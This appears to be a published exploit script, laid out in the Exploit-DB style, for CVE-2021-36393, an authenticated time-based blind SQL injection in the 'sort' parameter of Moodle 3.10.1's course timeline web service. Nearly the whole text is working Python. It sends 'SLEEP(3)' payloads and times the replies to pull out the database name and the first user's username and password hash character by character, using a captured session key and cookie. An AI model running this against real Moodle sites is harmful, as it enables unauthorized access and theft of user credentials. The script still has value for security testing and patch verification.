Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter

Apr 12th, 2024
  1. # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
  2. # Google Dork:
  3. # Date: 04/11/2023
  4. # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
  5. # Vendor Homepage: https://moodle.org/
  6. # Software Link:
  7. # Version: 3.10.1
  8. # Tested on: Linux
  9. # CVE : CVE-2021-36393
  10.  
  11. import requests
  12. import string
  13. from termcolor import colored
  14.  
# Request details.
# Every probe is a POST to the Moodle AJAX service endpoint below, so the
# activity is visible in the web server's access log as repeated POSTs to
# /moodle/lib/ajax/service.php from one session. The `sesskey` query
# parameter and the `MoodleSession` cookie are session-bound values; the ones
# recorded here are whatever was captured when the script was written.
_ORIGIN = "http://127.0.0.1:8080"
_SERVICE = "core_course_get_enrolled_courses_by_timeline_classification"

URL = (
    f"{_ORIGIN}/moodle/lib/ajax/service.php"
    "?sesskey=ZT0E6J0xWe"
    f"&info={_SERVICE}"
)

HEADERS = dict(
    [
        ("Accept", "application/json, text/javascript, */*; q=0.01"),
        ("Content-Type", "application/json"),
        ("X-Requested-With", "XMLHttpRequest"),
        (
            "User-Agent",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
        ),
        ("Origin", _ORIGIN),
        ("Referer", f"{_ORIGIN}/moodle/my/"),
        ("Accept-Encoding", "gzip, deflate"),
        ("Accept-Language", "en-US,en;q=0.9"),
        ("Cookie", "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0"),
        ("Connection", "close"),
    ]
)
  29.  
# Characters to test: the alphabet the extraction loop walks, in this order,
# when guessing each next character. `string.ascii_letters` is exactly
# lowercase followed by uppercase, so the sequence is unchanged.
_PUNCTUATION = "!@#$^&*()-_=+[]{}|;:'\",.<>?/"
characters_to_test = string.ascii_letters + string.digits + _PUNCTUATION
  32.  
def test_character(payload):
    """Send one probe and report whether the server took 3 s or more to answer.

    `payload` is posted as a single-element JSON array to URL with HEADERS.
    Only the response's round-trip time is inspected, never its body: a
    response that took at least three seconds counts as a hit, matching the
    SLEEP(3) delay requested by the payloads extract_value builds.
    """
    reply = requests.post(URL, headers=HEADERS, json=[payload])
    elapsed_seconds = reply.elapsed.total_seconds()
    return elapsed_seconds >= 3
  36.  
def _sort_probe(column, prefix):
    """Return the `sort` argument that tests whether *column* starts with *prefix*."""
    if column == "database()":
        return f"fullname OR (database()) LIKE '{prefix}%' AND SLEEP(3)"
    return f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{prefix}%' AND SLEEP(3)"


def extract_value(column, label):
    """Recover *column* one character at a time through the timing side channel.

    Every probe is the same web-service call (`base_payload`); only its
    `args["sort"]` field changes between requests. A candidate character is
    accepted when test_character reports a slow response, after which the
    next position is tried. Extraction stops after 50 characters or as soon
    as no candidate in characters_to_test produces a delay. Progress is
    printed in red on one updating line, then the final value on its own
    line.

    Args:
        column: Either the literal "database()" or a column name that is
            read from the first row of mdl_user.
        label: Prefix used in the printed output.
    """
    base_payload = {
        "index": 0,
        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",
        "args": {
            "offset": 0,
            "limit": 0,
            "classification": "all",
            "sort": "",
            "customfieldname": "",
            "customfieldvalue": "",
        },
    }

    recovered = ""
    for _ in range(50):  # the value is assumed to be at most 50 characters long
        for candidate in characters_to_test:
            base_payload["args"]["sort"] = _sort_probe(column, recovered + candidate)
            if test_character(base_payload):
                recovered += candidate
                print(colored(f"{label}: {recovered}", 'red'), end="\r")
                break
        else:
            # No candidate produced a delay: treat the value as complete.
            break

    # Print the final result
    print(colored(f"{label}: {recovered}", 'red'))
  71.  
if __name__ == "__main__":
    # Extract, in order: the current database name, then the username and
    # password column of the first mdl_user row.
    targets = (
        ("database()", "Database"),
        ("username", "Username"),
        ("password", "Password"),
    )
    for column, label in targets:
        extract_value(column, label)
  76.            